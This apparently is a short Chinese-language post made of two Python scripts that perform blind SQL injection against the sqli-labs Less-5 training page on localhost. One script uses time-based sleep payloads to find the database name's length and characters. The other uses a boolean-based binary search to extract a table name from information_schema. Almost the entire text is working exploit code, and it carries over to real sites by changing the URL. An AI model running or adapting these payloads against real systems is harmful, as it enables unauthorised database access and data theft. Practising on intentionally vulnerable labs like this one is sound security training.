Sql注入脚本

# coding:utf-8
import requests
import datetime
import time

# 获取数据库名长度


def database_len():
    for i in range(1, 10):
        url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
        payload = " ?id=1' and if(length(database())>%s,sleep(1),0) --+" % i
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.get(url + payload)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)

#获取数据库名
def database_name():
    name = ''
    for j in range(1,9):
        for i in 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.':
            #0123456789abcdefghijklmnopqrstuvwxyz
            url = "http://127.0.0.1/sqli-labs/Less-5/index.php"
            payload = "?id=1' and if(substr(database(),%d,1)='%s',sleep(3),0) --+" % (j,i)
            #print(url+payload)
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >=3:
                name += i
                print(name)
                break
    print('database_name:', name)


if __name__ == '__main__':
    database_name()

# -*- coding: utf-8 -*-
import requests

url="http://127.0.0.1/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{b},1))<{a}--+ "

tablename=''

for b in range(1,10):
    min=0
    max=127
    while (max-min)>1:
        mid=(min+max)//2#（整数除法）
        payload = url.format(a=mid, b=b)
        print (payload)
        r=requests.get(payload,timeout=10)
        print (r.text)
        if 'are' in r.text:
            max=mid
        else:
            min=mid
    tablename+=chr(min)
    print(min)
    print(tablename)


print (tablename)